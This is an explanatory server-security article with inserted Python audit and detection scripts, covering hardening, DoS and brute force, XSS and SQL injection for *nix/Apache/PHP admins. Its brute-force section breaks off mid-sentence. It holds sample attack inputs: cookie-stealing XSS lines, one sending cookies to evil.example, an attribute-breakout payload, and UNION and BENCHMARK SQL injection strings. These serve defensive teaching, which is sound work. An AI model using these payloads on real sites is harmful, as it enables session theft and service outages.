

In this article I want to collect the common types of attacks on servers and the means of protecting a server from them. A lot of books and articles have been written on security; the emphasis here is on the basic mistakes administrators make and how to eliminate them. Having read this article and checked his own server, the administrator still will not be able to sleep peacefully; he can only say that he has passed the "candidate minimum".

Administrators, remember three proverbs.
No, better print them out and hang them in your workplace in front of your eyes:
"Security is a process",
"When the admin has nothing to do, he is engaged in security",
"Security is defined by the weakest link"
The article is aimed at admins of *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) stacks and at protecting servers from remote attacks; for other admins I hope it will be food for thought.
Different books classify hacker attacks differently; I will introduce my own, conditional division of ALL attacks into two classes:

  • Attack on services that are vulnerable and accessible from the Internet
  • Attack through the dynamic content of a service

To understand this division, imagine a fictional script that remotely attacks Apache on port 80 and, as a result, Apache shuts down and you are left without your site, since there is nothing left to serve web pages. Or your sendmail mail server is sent 1000 characters instead of a short username as the parameter of the VRFY command; sendmail did not expect this and died, leaving you without mail. The general meaning of attacks of this conditional class is that some vulnerability in the application itself is exploited. And there are three paths:

  • path 1) the application crashes and the service is no longer available: a DoS situation;
  • path 2) the application starts consuming resources and, having exhausted them, produces a DoS;
  • path 3) the application is fed shellcode and the attacker's code is executed.

These are all attacks on the service (item 1) and they are treated in only one way: the administrator promptly learns from the developer about the vulnerability and updates the program.

An attack of the second class is when a dynamic service implemented in some programming language accepts parameters and acts on them without checking them. For example, an attacker with a browser crawls through an Apache-hosted site, looks for vulnerabilities in the site's own scripts and, exploiting them, gets what he wants. Or an IRC channel bot written in Tcl accepts requests from users (the number of a joke to show, the date for which to display the weather), and the hacker, reconstructing how the bot's code works (reverse engineering), constructs requests the bot's author did not anticipate.

If you ask "how is that possible?", then you definitely need this article. One way or another, everything will be spelled out below.

Attack on vulnerable services and the server itself

In this section I include all attacks whose impact falls on the system and its services. Such attacks are often possible because of errors in the implementation of a program, such as buffer overflows. In short, it looks like this: say a poorly written FTP server has an array (buffer) for the username of a fixed size (for example, 10 characters), and that FTP server receives 100 characters from an ill-wisher. If the server's code does not check for this situation, a buffer overflow occurs.

What is a buffer overflow good for, from the hacker's point of view? The excess data overwrites memory beyond the buffer, including the function's return address, which can be made to point at code the attacker supplied. Remotely, this executes arbitrary code on the target with the privileges of the vulnerable service; locally, if the program runs as root, it yields system administrator privileges. The payload that is injected through the overflow and performs actions for the hacker is called shellcode. Writing shellcode is not an easy task and requires knowledge of assembly language, which implies some professionalism in this area.

Protection against attacks on vulnerable services and the server itself

  • Update. You need to learn how to update the entire system, and therefore be able to
    "build world and the kernel" on *nix, update through the package system on Linux, and press the Update button in Windows Update on licensed MS Windows. FreeBSD admins need to be able to install software from the ports. This way you sail with the developers, not against them.

    MS Windows admins need to get used to the MSI distribution format and use it more often; Microsoft strongly recommends it and it supports replacing an old package with a new one. Whatever you put on your server, ask yourself: if a new version of this program comes out, how easy will it be to update it? You must build a solution you fully control. Yes, there are projects with their own developments or patches, but if your developments require freezing the applications you need at a certain version and you cannot apply your patches to the new system, such a solution is NOT worth it!

    Here I will make a lyrical digression and tell you how I had to break myself. I had read articles on the Internet that usually begin like this: "download the source and do make install". So, what next? How will you install the new version? Keep the old version so that you can run make (de|un)install in it, and then make install again in the new one? These questions were asked by my friend Dmitry Dubrovin when we started learning FreeBSD. I began to understand that he was right, and that at least for FreeBSD this path is not suitable; by not following the path of the FreeBSD developers, I only made things more difficult for myself.

    Now, having mastered FreeBSD, when a couple of commands fetch new sources for the kernel and the entire system, a couple more build the new world and kernel, and then the ports and applications are updated, you begin to understand the power of *nix systems. It is hard to convey the pride you feel when you upgrade a FreeBSD server from an old branch to the current one, rebuild the world, the system compiles itself from the new sources (like Munchausen pulling himself up by his own hair), and everything that worked before the upgrade still works "without a hitch".

    As you already understood, you must subscribe to the security mailing lists of the developers of the software your business runs on and update regularly. Updating everything must be perfected and put on rails.

  • Security tuning. Most server operating systems are not configured, out of the box, to work in the harsh "chemical" environment of the Internet. To keep hackers from "having their way" with your server, you need to perform security tuning, namely read the operating system vendor's security recommendations. Admins of *nix systems can run man security (on FreeBSD) and, after reading the developers' advice, make the fairy tale come true. But whatever the operating system, carefully test the operation of the server and its services after security tuning.
  • Firewall. A configured firewall that you personally checked with nmap and vulnerability scanners; if those programs produce output, do you all understand what is at stake? When setting up a firewall, remember that there are ways to bypass its rules. For example, a local network is protected by a firewall, yet crafted fragmented packets can, in some configurations, slip past rules that only inspect the first fragment and reach a host inside the network. Or a common administrator mistake: excessive trust in outgoing packets from his own server.

    Imagine a real situation: hostile code running on your server tries to initiate a connection back to the attacker's host (a reverse shell), and your firewall has the rule "everything is allowed from me to the Internet". When composing firewall rules, you need to fully understand the whole picture of network communication between your services and with remote clients.

  • Intrusion detection system. A firewall can be imagined as the stone walls of a knight's castle: built once, and you sit inside, dry and comfortable. But what if someone is already testing the strength of the walls with a cannon? Maybe it is time to look out from the castle and pour something on someone? To know what is happening outside the walls, you need an intrusion detection system (IDS) on the server. If you have such a system, based on whatever package you like, then when someone starts firing from the nmap cannon you will be aware of it, and the attacker will also be aware that "you know".
  • Analysis of non-standard situations. In the numerous logs on the system, messages like "error: cannot open file /etc/passwd" or "access denied" often flash by. These are small bells ringing about a misconfigured application that cannot read something somewhere, or maybe it is not a bell but an alarm sounding about a hacker who is halfway there.

    Either way, the admin should be aware of such things. To ease the administrator's work, programs exist that scan the logs for interesting phrases and send a report to the administrator by mail. Do not disdain this opportunity; such programs are comparable to guards who walk a trusted route and check whether everyone is behaving as prescribed.

  • Remove software versions. Remove banners from your services. No, not the banners you show on your site, but the lines your programs give out in greetings when a connection is made or in error output. There is no need to shine with the versions of your programs: hackers search the Internet for exploits for this or that vulnerability by version.

    There is no single solution. For example, if you install a program from the ports, do not run make install clean, since then everything will be downloaded, compiled and installed without you. Better run make fetch; make extract; then go into the work subdirectory (where the extracted sources are), and there you can change the version string in the sources or pass the program off as another one, and only then make install clean.

    Apache is informative out of place and still shines with the versions of the system, PHP, Perl and OpenSSL. This disgrace is disabled with the directives ServerSignature Off and ServerTokens Prod in httpd.conf (ServerTokens Prod still announces "Apache", but no version, OS or module list). On the Internet you can find help with replacing the banner of any program. The goal is the same: to deprive the attacker of valuable information. Looking at your list of services available from the Internet, ask yourself whether each gives away too much information about itself and the information it stores.

    For example, the DNS server bind can allow a "zone transfer", and then your computers with their IP addresses and domain names will be available to everyone, which is bad (restrict it with allow-transfer in named.conf). Check your server with various scanners and read their results carefully. When replacing a program's banner, I advise inserting not random text but a warning about responsibility and that actions are logged. There have been incidents where a hacker was acquitted in the courtroom because the hacked FTP server greeted him with "Welcome! Welcome!".

  • The minimum-requirement rule. Minimize the services available from the Internet. Disable what you do not need, since you cannot hack what is disabled. A common mistake: the MySQL server, paired with Apache on the same machine, is configured to be reachable remotely on its standard port 3306. Why? Run netstat -na | grep LISTEN (or sockstat -4l on FreeBSD, ss -ltn on Linux) and answer for yourself: do you know which programs are using which interface and which port? Are you in control? Good, if so.
  • Many strong and different passwords. In hacking videos and hackers' stories, the phrase "it's good that the admin had one password for the admin panel, which also worked for ssh and ftp" often flashes by. I hope this is not about you. Hence the rule: passwords for different services must be different and at least 16 characters long. Let them be written down on a piece of paper if you are afraid of forgetting (at this point security specialists kill me), but this is better than your password being cracked in a few minutes by a remote attacker because it was short and similar to a dictionary word.

    Different passwords for different services are easy to arrange if the services authenticate not against system users in /etc/passwd but against virtual users in their own flat-file or DBMS databases. Do not store the passwords for all the resources you have access to as admin in a password.txt file on the server.

  • Limitation. All your services must run under separate, limited accounts and never as root. Believe me, if someone gets as far as escalating privileges from a limited account to root (uid=0, gid=0), the only thing that saves you is the absence of known holes in your updated system.

    By the way, many admins forget: why, for example, should the accounts used to run Apache and MySQL have a shell at all? This can be disabled by specifying /bin/false or /usr/sbin/nologin instead of a shell. Honestly, check the accounts of the programs on your server and tell me if I am wrong. In your SQL databases, limit accounts to the minimum required privileges: do not grant FILE when only SELECT is ever called.

  • Everyone to jail! Learn to work with sandboxes or jails and run applications in these isolated rooms; this makes it harder to compromise the entire server. If you use virtualization, you can spread services across different guest operating systems.
  • Layered defense. If something can be forbidden in several ways in different places, do it. NEVER think "I forbade it here, forbidding it there is superfluous".
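The two checks from the "minimum requirement" and "limitation" items above (which ports are exposed to the Internet, and which service accounts still have a login shell) are easy to script. The following is an added example, not code from the original article: it parses a constructed netstat listener table and a few constructed /etc/passwd lines embedded in the script; the set of ports you expect to be public (22 and 80 here) is an assumption you must adjust for your own server.

```python
"""Audit helpers for the "minimum requirement" and "limitation" rules above.

Added example, not code from the original article. Both inputs are
constructed samples embedded below: a `netstat -na`-style listener table
and a few /etc/passwd lines. On a real host you would feed it the output
of `netstat -na | grep LISTEN` (or `sockstat -4l` on FreeBSD, `ss -ltn`
on Linux) and the contents of /etc/passwd.
"""
import re

# Constructed sample: what `netstat -na | grep LISTEN` might print on a
# LAMP box where MySQL was left reachable from the Internet.
SAMPLE_NETSTAT = """\
tcp4       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 *.3306                 *.*                    LISTEN
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp6       0      0 ::1.953                *.*                    LISTEN
"""

# Constructed sample /etc/passwd lines (FreeBSD-style fields).
SAMPLE_PASSWD = """\
root:*:0:0:Charlie &:/root:/bin/csh
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/bin/sh
postfix:*:125:125:Postfix Mail System:/nonexistent:/usr/sbin/nologin
admin:*:1001:1001:Site admin:/home/admin:/bin/sh
"""

# Ports that should be reachable from the Internet on this particular box
# (assumption for the example). Everything else bound to a wildcard
# address is flagged.
EXPECTED_PUBLIC_PORTS = {22, 80}

# Shells that do not allow an interactive login.
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}

_LISTEN_RE = re.compile(r"^(tcp\d?)\s+\d+\s+\d+\s+(\S+)\s+\S+\s+LISTEN\s*$")


def _split_addr_port(local):
    """BSD netstat prints addr.port, Linux prints addr:port; handle both."""
    addr, _, port = local.rpartition(".")
    if not port.isdigit():
        addr, _, port = local.rpartition(":")
    return addr, int(port)


def parse_listeners(netstat_text):
    """Return a list of (proto, address, port) for every LISTEN line."""
    listeners = []
    for line in netstat_text.splitlines():
        m = _LISTEN_RE.match(line)
        if not m:
            continue
        proto, local = m.groups()
        addr, port = _split_addr_port(local)
        listeners.append((proto, addr, port))
    return listeners


def exposed_ports(netstat_text, expected=EXPECTED_PUBLIC_PORTS):
    """Ports bound to a wildcard address that are not in the expected set."""
    wildcard = {"*", "0.0.0.0", "::"}
    return sorted(
        port for _, addr, port in parse_listeners(netstat_text)
        if addr in wildcard and port not in expected
    )


def service_accounts_with_shell(passwd_text, max_system_uid=1000):
    """System accounts (0 < uid < max_system_uid) that still have a real shell."""
    bad = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if 0 < uid < max_system_uid and shell not in NOLOGIN_SHELLS:
            bad.append((name, shell))
    return bad


if __name__ == "__main__":
    print("unexpected wildcard listeners:", exposed_ports(SAMPLE_NETSTAT))
    print("service accounts with a shell:", service_accounts_with_shell(SAMPLE_PASSWD))
```

On the sample the first check flags port 3306 (MySQL bound to every interface) and the second flags the mysql account, which still has /bin/sh. The bind address for MySQL belongs in my.cnf (bind-address=127.0.0.1) or behind a firewall rule; the shell is fixed with chsh or pw usermod.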

More about attacks on vulnerable services and the server itself.

  • DoS attack (Denial of Service): an attack whose goal is to exhaust some limited server resource (Internet channel, RAM, processor, and so on) so that the server cannot serve legitimate users. Figuratively speaking, imagine that an intruder calls you at home and stays silent on the phone, and this goes on all evening. Tired of it, you unplug the phone, and in the morning you learn that you missed an important call from your boss. That is a real-life analogy of a DoS attack.

    In real life DoS often looks like this: because of a bug in a program, processor usage jumps to 100% and stays there for a long time, and the attacker periodically exploits this hole. A poorly written application can eat up all the RAM. Or a "mail bomb" in the form of a heavily compressed archive of millions of [space] characters, which the antivirus unpacks for checking; the unpacked huge file overflows a partition on the server and/or causes the server to reboot.

    DoS Attack Protection:

    • Update the program that is being manipulated for the DoS attack
    • Set resource quotas for the account under which this program runs. *nix systems let you limit CPU time, memory, the number of spawned processes, open files and so on (ulimit, /etc/login.conf on FreeBSD, /etc/security/limits.conf on Linux).
    • Set up logging in the program, try to find the attacker-puppeteer and block him in the firewall.
    • Set up the program as advised by the developer, gurus or articles on the Internet, if you find yourself in such a situation.
  • DDoS (the same DoS, but you are attacked from several zombie computers led by
    the attacker). DDoS is destructive and is used only by vandals who have herds of zombie machines and will demand money to stop the attack, or who want to damage your business so that users, unable to reach your server, go to a competitor. DDoS is not used by hackers whose goal is to intellectually hack your server; yes, yes, your server is a "mystery" that they want to "solve".

    How to protect yourself from DDoS? If you rely on your own strength and means, then by automating the work with scripts you can fish IP addresses out of the various logs and enter them into prohibiting firewall rules. That is what the author of the article "Is there life under DDoS?" did, for example, and there are many articles on how to configure things to minimize the damage from DDoS.

    Protection against DDoS attacks:

    • If the DDoS is directed at the application, try to find in the logs the difference between attackers and legitimate users and, automating with a script, add the attackers to deny rules in the firewall
    • If the DDoS is directed at the system (for example, an attack over the ICMP protocol), automating with a script, add the sources to deny rules in the firewall
    • Set resource quotas for the account under which this program runs. *nix systems let you limit CPU time, memory, the number of spawned processes, open files and so on.
    • Set up the program as advised by the developer, gurus or articles on the Internet, if you find yourself in such a situation
    • Contact your upstream provider for whatever help they can give; a flood that saturates your link can only be stopped upstream of it. Write a complaint to abuse@ of the networks the attack comes from. This helps to partially dismantle the attacker's network; let him suffer damage, it costs him money. Enjoy the moral satisfaction.
    • Check out mod_security for Apache; it is a great tool that helps in some situations.
  • Brute-force password attack. Here no holes in programs are to blame; the attacker simply tries login/password pairs by force. Those who left the server with ssh configured but forgot to restrict ssh access to certain IPs and certain logins (the AllowUsers directive in sshd_config) must have seen in their logs the attempts to brute-force login:password pairs.

    Bruteforce password protection:

    • Limit the number of unsuccessful login/password attempts
    • If the application allows it, set up an increasing delay before the next login/password attempt.
    • If a narrow circle of people should work with the application, create such a rule and limit it to
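The log-analysis advice above, the DDoS item ("fish IP addresses out of the logs and enter them into prohibiting firewall rules") and the brute-force item all come down to the same script: parse the log, decide who is an attacker, emit deny rules. The following is an added example, not code from the original article. The sshd log lines are a constructed sample in syslog format; the threshold (5 failures in 10 minutes) and the pf table name are assumptions, and the firewall commands are only printed, so you can review them before piping them into sh.

```python
"""Brute-force detection from sshd log lines, as described above.

Added example, not code from the original article. The log lines are a
constructed sample in syslog format; the firewall commands are emitted as
text so the script can be reviewed before anything is actually blocked
(pipe the output into `sh` once you trust it). The threshold and window
are assumptions; tune them to your traffic.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of /var/log/auth.log: one attacker hammering sshd,
# one legitimate user who mistyped a password once, and a slow scanner.
SAMPLE_AUTH_LOG = """\
Jun 19 10:00:01 srv sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 40001 ssh2
Jun 19 10:00:03 srv sshd[1203]: Failed password for invalid user test from 203.0.113.5 port 40002 ssh2
Jun 19 10:00:04 srv sshd[1205]: Failed password for root from 203.0.113.5 port 40003 ssh2
Jun 19 10:00:06 srv sshd[1207]: Failed password for root from 203.0.113.5 port 40004 ssh2
Jun 19 10:00:07 srv sshd[1209]: Failed password for invalid user oracle from 203.0.113.5 port 40005 ssh2
Jun 19 10:01:10 srv sshd[1211]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Jun 19 10:01:15 srv sshd[1211]: Accepted password for alice from 198.51.100.7 port 51000 ssh2
Jun 19 10:30:00 srv sshd[1300]: Failed password for root from 203.0.113.9 port 40010 ssh2
Jun 19 10:45:00 srv sshd[1301]: Failed password for root from 203.0.113.9 port 40011 ssh2
"""

_FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(log_text, year=2024):
    """Yield (timestamp, ip, user) for every failed sshd login in the log."""
    for line in log_text.splitlines():
        m = _FAIL_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; assume the one given.
        ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
        yield ts, m.group("ip"), m.group("user")


def brute_force_sources(log_text, threshold=5, window=timedelta(minutes=10)):
    """IPs with at least `threshold` failures inside any `window`-long span.

    A sliding window keeps a slow, patient scan (two failures an hour
    apart) from being confused with a dictionary attack.
    """
    by_ip = defaultdict(list)
    for ts, ip, _ in parse_failures(log_text):
        by_ip[ip].append(ts)
    offenders = []
    for ip, stamps in by_ip.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                offenders.append(ip)
                break
    return sorted(offenders)


def firewall_rules(ips, table="bruteforce"):
    """Render deny entries for pf (FreeBSD) and ipfw; keep the one you use.

    The pf line assumes `table <bruteforce> persist` and
    `block in quick from <bruteforce>` are already in pf.conf.
    """
    rules = []
    for ip in ips:
        rules.append(f"pfctl -t {table} -T add {ip}")
        rules.append(f"ipfw add 100 deny ip from {ip} to me")
    return rules


if __name__ == "__main__":
    for rule in firewall_rules(brute_force_sources(SAMPLE_AUTH_LOG)):
        print(rule)
```

On the sample only 203.0.113.5 crosses the threshold; alice's single typo and the scanner that tries once every fifteen minutes do not. Run it from cron over the last hour of the log, and remember that against a real botnet IP lists grow without bound, which is why the text above also points you to the upstream provider.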
Attack through the dynamic content of the service

This type of attack most often occurs against the bundle Apache + (PHP | Perl) + (MySQL | PostgreSQL) in the *nix world and IIS + ASP + Microsoft SQL Server in the MS Windows world, using an ordinary browser, but that is only a special case, simply the most common one because of the popularity of the web. In this bundle the programming languages are ASP, PHP, Perl and SQL, so they are what hackers will most often use to compose their destructive constructions.

BUT the most important thing to understand is that there are many such bundles of service + dynamic content on top of it, in many programming languages, and therefore all of them are under the hackers' gun. For example, an incomplete list:

  • Web server + CGI scripts
  • An ancient bundle no longer in use: Apache + the PHF (namely P H F) CGI script
  • IIS + ColdFusion Application Server
  • SSI mechanism (Server Side Includes)

Next we will talk mostly about web hacks, but do not forget that everything described below is true for other service + dynamic content bundles. The words differ, but the essence is the same. Today hackers attack the web with a browser, tomorrow with client R against service Z. The web server, connected to databases and numerous programming languages, has become the platform for attacks of this kind.

The meaning of all attacks of this kind is to examine the site with a browser in order to find errors in the scripts that serve the site's dynamic content.

Hence the conclusion: hacking a site through its content, when the site consists only of static HTML pages that merely link to each other, is IMPOSSIBLE (the web server itself can still be attacked, but that is the first class of attacks above). Attacks through your web site appeared when people wanted more interactivity and added it through programming languages and databases.

Hackers surfing a site pay special attention to scripts that are passed any parameter. What if the script's author does not check what exactly is passed as the parameter's value?

General solutions for the admin against attacks on the dynamic content of a service (a web site as the special case)

  • Update. We have already talked about this, but if you use third-party developments (forum engines, galleries, chats, etc.), you will receive reports about vulnerabilities and must patch the holes. The hackers' opinion is that if a portal works with money and its turnover, it is undesirable for such a portal to run anyone's developments except its own. Of course, it is assumed that the site's own engine was written by coders who know how to program securely and understand the threats on the Internet.
  • Be non-standard. In many hacker utilities and vulnerability databases the paths forum/, gallery/, images/ flash by. Very convenient! Know, admin, that half of them will choke and give up on your site when it is not located in /usr/www and your admin panel is not at site.com/admin. The bottom line: if you are non-standard, that is an extra spoke in the wheel of the hacker attacking your site. He will have to add to or correct the database/script by hand. But is a hacker always able or willing to do it? Young hackers, "script kiddies", will certainly be scared off. For example, PHP security tips:

    # Make PHP code look like other types of code
    AddType application/x-httpd-php .asp .py .pl
    # Make PHP code look like unknown type codes
    AddType application/x-httpd-php .bop .foo .133t
    # Make PHP code look like html
    AddType application/x-httpd-php .html .htm

    This form of protecting PHP through obscurity has its downsides, but it costs little. Hackers themselves, describing their hacks, write that they download the same software that sits on your server from the developer's site and look at what default table names and paths this or that engine works with. The general meaning of being non-standard is to delay the hacking process so that the hacker gets no "blitzkrieg", and the longer it drags on, the more likely he is to be detected.

  • Remove the versions of engines and scripts on the site. This is valuable information the attacker should be deprived of: knowing the version, he looks for turnkey hacking solutions. Make sure your scripts do not display useful information on errors, such as the path of the script where the error occurred (the "path disclosure" problem) and the text of the error itself.
  • Consider whether you need .htaccess. The presence of .htaccess files means the options set in the main Apache config can be overridden; believe me, hackers will do just that. If you disable .htaccess with the "AllowOverride None" directive, you gain performance, since Apache will not have to look through every directory on the path to the page on each request, and you increase the security of the web server.
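The three Apache directives this article asks you to set (ServerSignature Off and ServerTokens Prod in the banner item above, AllowOverride None here) are the kind of thing that silently regresses after an upgrade, so it pays to lint httpd.conf for them. The following is an added example, not code from the original article or from the Apache project: the two config fragments are constructed samples, and the linter reads only the text it is given (it does not follow Include directives or track <Directory> context).

```python
"""Lint an Apache httpd.conf for the information-leak and .htaccess points above.

Added example, not code from the original article. It checks the three
directives discussed in this article (ServerTokens, ServerSignature,
AllowOverride) against a constructed sample config; extend WANTED for
your own policy. It only reads the main config, not included files.
"""
import re

# Constructed sample: a stock-looking httpd.conf that leaks versions and
# lets every directory override the main config through .htaccess.
WEAK_CONF = """\
ServerRoot "/usr/local"
Listen 80
ServerTokens Full
ServerSignature On
<Directory "/usr/local/www/apache24/data">
    Options Indexes FollowSymLinks
    AllowOverride All
    Require all granted
</Directory>
"""

# The same config after applying the advice in this section.
HARDENED_CONF = """\
ServerRoot "/usr/local"
Listen 80
ServerTokens Prod
ServerSignature Off
<Directory "/usr/local/www/apache24/data">
    Options FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
"""

# directive -> (required value, explanation). Values compare case-insensitively.
WANTED = {
    "ServerTokens": ("Prod", "banner shows 'Apache' only, no version/OS/modules"),
    "ServerSignature": ("Off", "no version line on error pages and listings"),
    "AllowOverride": ("None", ".htaccess cannot override the main config"),
}

_DIRECTIVE_RE = re.compile(r"^\s*(\w+)\s+(.+?)\s*$")


def parse_directives(conf_text):
    """Return (line_no, directive, value) for plain directives, skipping
    comments, blank lines and <Section> tags (context is not tracked)."""
    out = []
    for n, line in enumerate(conf_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or stripped.startswith("<"):
            continue
        m = _DIRECTIVE_RE.match(line)
        if m:
            out.append((n, m.group(1), m.group(2)))
    return out


def lint(conf_text, wanted=WANTED):
    """List findings as (line_no, message); line_no 0 means the directive is absent.

    Apache defaults to ServerTokens Full, ServerSignature Off and (since
    2.3.9) AllowOverride None, but an explicit setting is what you want to
    see and grep for, so absence is reported too.
    """
    findings = []
    seen = set()
    for n, directive, value in parse_directives(conf_text):
        if directive not in wanted:
            continue
        seen.add(directive)
        expected, why = wanted[directive]
        if value.lower() != expected.lower():
            findings.append((n, f"{directive} {value}: should be '{expected}' ({why})"))
    for directive in wanted:
        if directive not in seen:
            findings.append((0, f"{directive} not set explicitly"))
    return findings


if __name__ == "__main__":
    for conf in (WEAK_CONF, HARDENED_CONF):
        print(lint(conf) or ["ok"])
```

Run it against the real file with `lint(open("/usr/local/etc/apache24/httpd.conf").read())`; anything it reports on the weak sample (lines 3, 4 and 7) is exactly what ServerTokens Prod, ServerSignature Off and AllowOverride None fix.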

More about attacks on dynamic content (a web site as the special case)

  • XSS (Cross Site Scripting).
    Cross-site scripting is abbreviated XSS, not CSS, since CSS was already taken by "Cascading Style Sheets". XSS attacks are not directed against the server but against the users of that server. But the admin should not rejoice! An XSS attack looks like this: the site has editable fields on a web page, or script parameters, that are not filtered for HTML tags and JavaScript.

    The hacker adds code in a client-side language, usually JavaScript (or VBScript in old Internet Explorer), to the editable fields, and this code becomes part of the HTML page. When a user visits such a page, his browser parses the page and executes the code.
    What do hackers do with XSS?

    • Theft of cookies: these small text records store information the server "put" to the user for his subsequent identification. In the example, if you create a test.html file with this content (write it yourself), then when opened in a browser it will show the XSS.
      Dear admin, I had an error visiting the site
      Help

      But you can write a more serious script in JavaScript: document.location="address of the cookie receiver"+document.cookie. Typically such scripts are sent to the admin's webmail and, using social engineering, the attacker tries to get him to read the message in order to obtain his cookies.

      If the cookies are not tied to an IP address and there are no additional security measures, the attacker replaces his cookies with the admin's and tries to get into the admin panel, which does not check login and password and identifies people only by cookies.

    • Site deface (replacement of the site's start page, most often index.html)
    • Trojanization of a remote user. Fresh exploits are selected for users' browsers, and when a user opens the vulnerable page an attempt is made to infect his computer with a Trojan. If the user has an antivirus with fresh databases, it will report the appearance of a Trojan on the system, and your site will fall in the user's eyes; perhaps he will not come to you again.
    • DoS. With a large number of visitors, the injected script additionally requests more pages from your server or from someone else's, and someone gets a DoS.

    Solution to the problem:

    • To keep HTML tags typed into input fields from reaching the database and then the page, use constructs like htmlspecialchars() in PHP, which replaces < with &lt;, > with &gt;, & with &amp; and, with ENT_QUOTES, the quotes " and ' with entities, so the browser shows the text instead of interpreting it. Escape at the point where data is written into the page and match the escaping to the context (HTML body, attribute, JavaScript).
      Example,

      $comment = htmlspecialchars($comment, ENT_QUOTES, 'UTF-8');
      // Prepared statement: the values are bound, never pasted into the SQL text
      $stmt = $mysqli->prepare("INSERT INTO guestbook (name, location, email, url, comment)
                                VALUES (?, ?, ?, ?, ?)");
      $stmt->bind_param("sssss", $name, $location, $email, $url, $comment);
      $stmt->execute() or die($stmt->error);

    • Check and filter in your scripts all parameters that the user enters or that are passed to the script through the address bar. Learn to use regular expressions properly to parse incoming data. For your programming language, find material that teaches you how to code securely.
    • If you want to use cookies on your site, read up on cookie security practices. Limit their lifetime and tie them to IP addresses.
    • As an admin, be vigilant against social engineering. Do not forget about the security of the personal computer you administer from.
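The htmlspecialchars() advice above has a subtlety worth seeing in working code: escaping only < > & is enough for text between tags, but a value echoed back into an attribute can be broken out of with a bare quote, which is exactly what ENT_QUOTES is for. The following is an added example, not code from the original article, written in Python with html.escape() as the counterpart of htmlspecialchars(); the guestbook comments are constructed payloads.

```python
"""Output escaping against XSS, the Python counterpart of the htmlspecialchars() advice above.

Added example, not code from the original article. html.escape() does
what htmlspecialchars($s, ENT_QUOTES) does: it turns <, >, &, " and '
into entities so the browser sees text, not markup. The payloads are
constructed samples.
"""
import html

# Constructed guestbook entries: a harmless one, a classic tag injection
# (the cookie thief from the text), and one that breaks out of a
# single-quoted attribute without using < or > at all.
COMMENTS = [
    "Nice site, thanks!",
    "<script>document.location='http://evil.example/c?'+document.cookie</script>",
    "x' onmouseover='alert(1)",
]


def render_unsafe(comment):
    """The bug: user input is concatenated straight into the page."""
    return f"<p>{comment}</p>"


def render_safe(comment):
    """Body context: escape everything that can start markup."""
    return f"<p>{html.escape(comment)}</p>"


def render_attr_unsafe(value):
    """Value echoed into a single-quoted attribute with only < > & escaped,
    which is what htmlspecialchars() without ENT_QUOTES gives you."""
    return f"<input name='q' value='{html.escape(value, quote=False)}'>"


def render_attr_safe(value):
    """Same, but quotes are escaped too, so the attribute cannot be closed early."""
    return f"<input name='q' value='{html.escape(value, quote=True)}'>"


def has_breakout(rendered, marker="' onmouseover="):
    """True if the attribute-breakout payload survived into the markup."""
    return marker in rendered


if __name__ == "__main__":
    for c in COMMENTS:
        print(render_unsafe(c))
        print(render_safe(c))
    print(render_attr_unsafe(COMMENTS[2]))   # attribute closed early, handler injected
    print(render_attr_safe(COMMENTS[2]))     # quote becomes &#x27;, stays inert
```

Note that escaping belongs at output time, chosen per context; the PHP above escapes before storing, which works for a guestbook but means the stored text is already HTML-specific. Neither escaping protects a value placed inside a JavaScript block or a URL, which need their own encoding.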
  • SQL injection.
    This disease means that an unchecked parameter is substituted into an SQL query inside the script. The hacker finds scripts suffering from SQL injection in a simple way: a quote is appended to the parameter value, site.com/view.php?id=1', or a numeric parameter is modified like site.com/view.php?id=2-1 (if the page for id=1 comes back, the value is being placed into the query unquoted and evaluated by the database).

    If the injected quote produces an "error" (a lot of messages that such-and-such query was not executed in such-and-such script at such-and-such path), the script is a candidate for further pumping. Attackers often use Google hacking, asking the search engine something like "site:www.victim.ru Warning". Google will return the broken scripts on your site, so old that the Google spider has long since indexed them.

    Code that does not check the value and suffers from SQL injection:

    $id = $_REQUEST["id"];
    $result = mysql_query("SELECT title, text, datenews, author FROM `news` WHERE `id`=$id");

    Now imagine that instead of a number the value -1 union select null/* is substituted (the attacker adds null columns until the column count matches yours), and your query turns into

    SELECT title, text, datenews, author FROM `news` WHERE `id`=-1 union select null/*

    That is, the hacker wants his query to be executed in addition to yours, joined to it with the UNION operator. Then he will try other queries and, given the power of SQL, this does not bode well for the administrator: anything from a deface (replacing the site's start page) to obtaining root on your server. A hacker can also mount a DoS attack through SQL injection: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))); a couple of such requests and the server sits at 100% CPU for a long time.

    SQL Injection Protection:

    • Make use of SQL server features such as views and stored procedures. They limit what the application account can reach in the database.
    • Before passing a parameter to a query, check its type (in PHP: is_int(), is_float(), is_string(), is_array() and so on, or simply cast with (int)) and, at the very least, escape it with the driver's own function (mysqli_real_escape_string() in PHP; addslashes() is not a safe substitute, it knows nothing about the connection's character set). Better still, use prepared statements with bound parameters, so the value can never be parsed as SQL.
    • All scripts work with the database from some database account; remove from this account every privilege not needed for the work. Hackers often use the MySQL command (MySQL is taken as an example, this applies to any SQL server) LOAD DATA INFILE to read files from the server that are readable by the account MySQL runs under. Hence the conclusion: disable unnecessary privileges for your scripts, such as FILE, which LOAD DATA INFILE, LOAD_FILE() and SELECT ... INTO OUTFILE require. Take the principle of the "basic minimum" as the foundation.
    • The system account under which the SQL server runs should not have access to the site's pages or to the server's system files.
